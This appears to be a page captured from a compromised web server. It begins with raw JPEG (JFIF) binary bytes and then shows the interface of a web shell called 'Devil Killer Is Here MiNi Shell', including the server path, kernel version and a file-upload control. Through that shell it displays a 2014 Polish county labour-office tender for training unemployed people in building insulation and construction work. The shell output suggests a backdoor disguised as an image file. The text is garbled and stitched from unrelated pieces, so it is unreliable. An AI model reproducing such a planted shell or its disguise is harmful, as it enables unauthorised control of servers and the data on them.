JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140630/139695-N-2014.html

<p class="kh_header"><b>Aleksandrów Kujawski: Organizacja i przeprowadzenie szkoleń dla osób bezrobotnych: Część I -  szkolenie: Termomodernizacja budynków,
Część II - szkolenie: Pracownik budowlany</b><br>
<b>Numer ogłoszenia: 139695 - 2014; data zamieszczenia: 30.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Przemysłowa 1, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 054 2824696, faks 054 2824696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-aleksandrowkujawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń dla osób bezrobotnych: Część I -  szkolenie: Termomodernizacja budynków,
Część II - szkolenie: Pracownik budowlany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - szkolenie Termomodernizacja budynków
1. Szkolenie powinno odbywać się w miejscowości Aleksandrów Kujawski.
2. Zajęcia praktyczne zostaną przeprowadzone w obiekcie użyteczności publicznej, zlokalizowanym na terenie Aleksandrowa Kujawskiego. Dokładne miejsce odbywania zajęć praktycznych Zamawiający wskaże przed podpisaniem umowy.
3. Szkoleniem objętych będzie 14 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 200 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy.  
4. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA- CZĘŚĆ I
1) Szkolenie powinno odbywać się w miejscowości Aleksandrów Kujawski.
2) Zajęcia praktyczne zostaną przeprowadzone w obiekcie użyteczności publicznej, zlokalizowanym na terenie Aleksandrowa Kujawskiego. Dokładne miejsce odbywania zajęć praktycznych Zamawiający wskaże przed podpisaniem umowy. Zajęcia praktyczne prowadzone będą w budynku jednokondygnacyjnym, bez podpiwniczenia, o wymiarach zewnętrznych 31,70x18,28m.  
3) Szkoleniem objętych będzie 14 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy 
w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 200 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach 
w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy.  
4) Zajęcia praktyczne muszą obejmować co najmniej 155 godzin. W ramach zajęć teoretycznych uczestnicy szkolenia muszą nabyć wiedzę co najmniej w następującym zakresie:
- zasady bhp na stanowisku pracy montera ociepleń budynków,
- technologia prac,
- dokumentacja prac montera dociepleń budynków, w tym zapoznanie z rysunkiem zawodowym,
- materiałoznawstwo.
5) W ramach zajęć praktycznych przewiduje się docieplenie ścian zewnętrznych ( z cegły kratówki) wraz 
z tynkiem cienkowarstwowym oraz wykonanie izolacji pionowej fundamentów wraz z ich dociepleniem. Materiały niezbędne do realizacji zajęć praktycznych w zakresie ocieplenia budynku zostaną dostarczone przez Zamawiającego. 
a) W ramach ocieplenia w/w budynku przewiduje się:
- zagruntowanie ścian zewnętrznych emulsją ATLAS UNI-GRUNT celem redukcji chłonności podłoża,
- mocowanie podstawowe - zaprawa klejąca ATLAS STOPTER K-20,
- warstwa izolacji termicznej z płyt styropianowych samogasnących frezowanych o wymiarach 50x100cm        odmiany EPS 80-036-fasada grubości 15cm, a dla ościeży 2cm,
- mocowanie dodatkowe w postaci kołków plastikowych o długości 20cm w ilości4-5szt./m2,
- zatopienie siatki w zaprawie ATLAS STOPTER K-20,
- wykonanie podkładu tynkarskiego,
- wykonanie wyprawy tynkarskiej,
- wykonanie powłoki malarskiej.
6) Wymagane narzędzia i urządzenia, w ilości i jakości niezbędnej do prawidłowego przeprowadzenia szkolenia, zabezpiecza Wykonawca. 
7)  W trakcie odbywania zajęć powinny być zapewnione właściwe, zgodne z obowiązującymi  przepisami warunki bezpieczeństwa i higieny pracy.
8) Wykonawca zobowiązany jest do ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków za cały okres kursu z wyłączeniem osób, które pobierają stypendium ( zgodnie z art. 41 ust 7 ustawy o promocji zatrudnienia i instytucjach rynku pracy). Fakt ten Zamawiający potwierdzi na liście kandydatów przekazanej organizatorowi szkolenia. 
9) Szkolenie musi zostać przeprowadzone według zasad określonych w rozporządzeniu Ministra Edukacji Narodowej w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U.
 z 2012r., poz.186) oraz spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. Program szkolenia powinien być opracowany z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych w bazach danych ministerstwa pracy i Polityki Społecznej (http://www.kwalifikacje.praca.gov.pl).
10) Rozpoczęcie szkolenia przewidziane jest bezzwłocznie po zawarciu umowy szkoleniowej.
11) W ramach szkolenia Wykonawca zobowiązany jest do:
    a) zapewnienia ośrodka szkoleniowego,
    b) zapewnienia materiałów szkoleniowych do zajęć teoretycznych, w postaci  podręcznika lub skryptu, notatnika,  długopisu, dla każdego uczestnika szkolenia,
    c) wyposażenia sali do zajęć teoretycznych w rzutnik multimedialny, ekran i tablicę flipchart,
    d) przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
    e) sprawowania nadzoru nad frekwencją uczestników szkolenia,
    f) prowadzenia dziennika zajęć,
    g) zakończenia szkolenia poprzez przeprowadzenie egzaminu końcowego i wydanie dokumentu o ukończeniu szkolenia,
    h) przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury i protokołu z egzaminu oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
     i) umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji,
      j) zapewnienia uczestnikom szkolenia bezpłatnego zaplecza socjalnego ( kawa, herbata, zimne napoje, kanapka lub słodka bułka po jednej sztuce dla każdego uczestnika szkolenia na każdy dzień szkolenia),
     k) odzież robocza: rękawice ochronne (nowe), odzież ochronna (nowe spodnie ogrodniczki i nowa bluza robocza zapinana z przodu w rozmiarze uniwersalnym, bądź dopasowane do uczestników szkolenia), buty robocze ochronne (nowe), w rozmiarze dopasowanym do uczestników szkolenia. Odzież robocza po zakończeniu szkolenia przejdzie w posiadanie absolwentów w/w szkolenia,
     l) zapewnienia wykwalifikowanej kadry, sprawującej nadzór nad realizacją szkolenia. Przy czym szkolenie praktyczne musi zostać prowadzone przez co najmniej 2 osoby.
12) Zajęcia winny odbywać się w wymiarze co najmniej 25 godzin zegarowych tygodniowo, od poniedziałku do piątku, nie mniej niż 6 i nie więcej niż 8 godz. dziennie. W szczególnie uzasadnionych przypadkach, po pisemnym uzgodnieniu z Zamawiającym, dopuszcza się możliwość organizacji zajęć w sobotę.
13) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. koszt egzaminów, wynajem sali, materiały dydaktyczne, podręczniki, skrypty, wynajem sprzętu, narzędzi, urządzeń, wynagrodzenie wykładowców, odzież ochronną oraz inne składowe.
14) Celem szkolenia jest wyposażenie uczestników w wiedzę, umiejętności praktyczne, niezbędne do wykonywania pracy na stanowisku - montera ociepleń budynków.
15) Szczegółowy projekt, charakteryzujący zakres wymaganych prac w ramach szkolenia praktycznego, dostępny w siedzibie Zamawiającego.


Część II - szkolenie Pracownik budowlany
1. Część teoretyczna szkolenia powinna odbywać się w miejscowości Aleksandrów Kujawski. Część praktyczna szkolenia powinna zostać zrealizowana na terenie powiatu aleksandrowskiego, z zastrzeżeniem, iż w przypadku przeprowadzenia szkolenia praktycznego poza miastem Aleksandrów Kujawski, Wykonawca zobowiązuje się zapewnić transport uczestnikom szkolenia z Aleksandrowa Kujawskiego do miejsca odbywania zajęć i z powrotem. Koszt dowozu musi zostać wliczony w cenę szkolenia od osoby i wykazany w odrębnej pozycji w preliminarzu kosztów (zał. nr 7 do SIWZ).
2. Zajęcia praktyczne muszą zostać przeprowadzone u pracodawców, którzy zapewnią odpowiednie zaplecze, nadzór, warunki i materiały do przeprowadzenia zajęć praktycznych.
3. Szkoleniem objętych będzie 6 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 140 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach 
w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy.  
4. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA- CZĘŚĆ II
1) Część teoretyczna szkolenia powinna odbywać się w miejscowości Aleksandrów Kujawski. Część praktyczna szkolenia powinna zostać zrealizowana na terenie powiatu aleksandrowskiego, 
z zastrzeżeniem, iż w przypadku przeprowadzenia szkolenia praktycznego poza miastem Aleksandrów Kujawski, Wykonawca zobowiązuje się zapewnić transport uczestnikom szkolenia z Aleksandrowa Kujawskiego do miejsca odbywania zajęć i z powrotem. Koszt dowozu musi zostać wliczony w cenę szkolenia od osoby i wykazany w odrębnej pozycji w preliminarzu kosztów (zał. nr 7 do SIWZ).
2) Zajęcia praktyczne muszą zostać przeprowadzone u pracodawcy/ów, którzy zapewnią odpowiednie zaplecze, nadzór, warunki i materiały do przeprowadzenia zajęć praktycznych. Wykonawca musi dołączyć do oferty pisemną zgodę na przyjęcie uczestników szkolenia na praktykę realizowaną przez inny podmiot, wraz z wskazaniem opiekuna praktyki.
3) Szkoleniem objętych będzie 6 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu 
W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 140 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach 
w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy.  
4) Zajęcia praktyczne muszą obejmować co najmniej 100 godzin. W ramach zajęć teoretycznych uczestnicy szkolenia muszą nabyć wiedzę co najmniej w następującym zakresie:
- zasady bhp na stanowisku pracy robotnika budowlanego,
- rozpoznanie i przygotowanie podłoża,
- materiały do wykonywania zapraw i betonów. Zasady wykonywania przedmiaru i obmiaru robót murarskich i tynkarskich,
- dobieranie narzędzi i sprzętu do robót murarskich i tynkarskich,
- rysunek zawodowy z podstawami kosztorysowania i wymiarowania,
- materiałoznawstwo.
5)  W trakcie odbywania zajęć powinny być zapewnione właściwe, zgodne z obowiązującymi  przepisami warunki bezpieczeństwa i higieny pracy.
6) Wykonawca zobowiązany jest do ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków za cały okres kursu z wyłączeniem osób, które pobierają stypendium ( zgodnie z art. 41 ust 7 ustawy o promocji zatrudnienia i instytucjach rynku pracy). Fakt ten Zamawiający potwierdzi na liście kandydatów przekazanej organizatorowi szkolenia. 
7) Szkolenie musi zostać przeprowadzone według zasad określonych w rozporządzeniu Ministra Edukacji Narodowej w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U.
 z 2012r., poz.186) oraz spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. Program szkolenia powinien być opracowany z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych w bazach danych ministerstwa pracy i Polityki Społecznej (http://www.kwalifikacje.praca.gov.pl).
8) Rozpoczęcie szkolenia przewidziane jest bezzwłocznie po zawarciu umowy szkoleniowej.
9) W ramach szkolenia Wykonawca zobowiązany jest do:
    a) zapewnienia ośrodka szkoleniowego,
    b) zapewnienia materiałów szkoleniowych do zajęć teoretycznych, w postaci  podręcznika lub skryptu, notatnika,  długopisu, dla każdego uczestnika szkolenia,
    c) wyposażenia sali do zajęć teoretycznych w rzutnik multimedialny, ekran i tablicę flipchart,
    d) przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
    e) sprawowania nadzoru nad frekwencją uczestników szkolenia,
    f) prowadzenia dziennika zajęć,
    g) zakończenia szkolenia poprzez przeprowadzenie egzaminu końcowego i wydanie dokumentu 
o ukończeniu szkolenia,
    h) przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury i protokołu z egzaminu oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
     i) umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji,
      j) zapewnienia uczestnikom szkolenia bezpłatnego zaplecza socjalnego ( kawa, herbata, zimne napoje, kanapka lub słodka bułka po jednej sztuce dla każdego uczestnika szkolenia na każdy dzień szkolenia),
     k) odzież robocza: rękawice ochronne (nowe), odzież ochronna (nowe spodnie ogrodniczki i nowa bluza robocza zapinana z przodu w rozmiarze uniwersalnym, bądź dopasowane do uczestników szkolenia), buty robocze ochronne (nowe), w rozmiarze dopasowanym do uczestników szkolenia. Odzież robocza po zakończeniu szkolenia przejdzie w posiadanie absolwentów w/w szkolenia.
10) Zajęcia winny odbywać się w wymiarze co najmniej 25 godzin zegarowych tygodniowo, od poniedziałku do piątku, nie mniej niż 6 i nie więcej niż 8 godz. dziennie. W szczególnie uzasadnionych przypadkach, po pisemnym uzgodnieniu z Zamawiającym, dopuszcza się możliwość organizacji zajęć w sobotę.
11) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. koszt egzaminów, wynajem sali, materiały dydaktyczne, podręczniki, skrypty, wynajem sprzętu, narzędzi, urządzeń, wynagrodzenie wykładowców oraz inne składowe. Wykonawca w preliminarzu kosztów musi ująć wszystkie koszty związane z zakupem materiałów budowlanych, przewidzianych do realizacji zajęć praktycznych.
12) Celem szkolenia jest wyposażenie uczestników w wiedzę, umiejętności praktyczne, niezbędne do wykonywania pracy na stanowisku - robotnik budowlany.
13) Wykonawca zobowiązuje się zapewnić w odpowiedniej ilości i jakości materiały, produkty, sprzęt, narzędzia itp. niezbędne do prawidłowej realizacji zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek niniejszy spełniają Wykonawcy którzy: są wpisani do rejestru instytucji szkoleniowych prowadzonych przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (rozporządzenie Ministra Gospodarki i Pracy z dnia 27.10.2004r. w sprawie rejestru instytucji szkoleniowych) oraz złożą oświadczenie o aktualizacji wpisu na 2014 rok</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek niniejszy spełniają Wykonawcy, którzy w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, zrealizowali przynajmniej dwa szkolenia, obejmujące przedmiot zamówienia o które się ubiegają w niniejszym postępowaniu i które prowadzone były dla grupy min. 5 osobowej (szkolącej się w tym samym miejscu i w tym samym czasie - chyba, że ze względu na specyfikę szkolenia, zostało ono przeprowadzone w podgrupach). Dla potwierdzenia wymienionego warunku Zamawiający żąda przedłożenia przez Wykonawcę oświadczenia, zgodnie z załącznik nr 8 do SIWZ. Zamawiający, na potwierdzenie należytego wykonania zamówienia, żąda załączenia dowodów potwierdzających, że Wykonawca należycie zrealizował co najmniej 2 usługi szkoleniowe o wskazanej tematyce, w okresie ostatnich trzech lat przed upływem terminu składania ofert dla każdego kursu o jaki Wykonawca się ubiega</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia wymienionego warunku Zamawiający żąda przedłożenia przez Wykonawcę oświadczenia - załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena wymienionego warunku będzie dokonywana w oparciu o oświadczenie dołączone do oferty - załącznik nr 2 do SIWZ. Kadra prowadząca zajęcia teoretyczna musi posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia o podobnym zakresie tematycznym w stosunku do przedmiotowego szkolenia. Kadra zaangażowana w prowadzenie zajęć praktycznych musi legitymować się wykształceniem min. średnim i co najmniej 
2 letnim doświadczeniem zawodowym tożsamym lub podobnym pod względem zawartości merytorycznej do przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
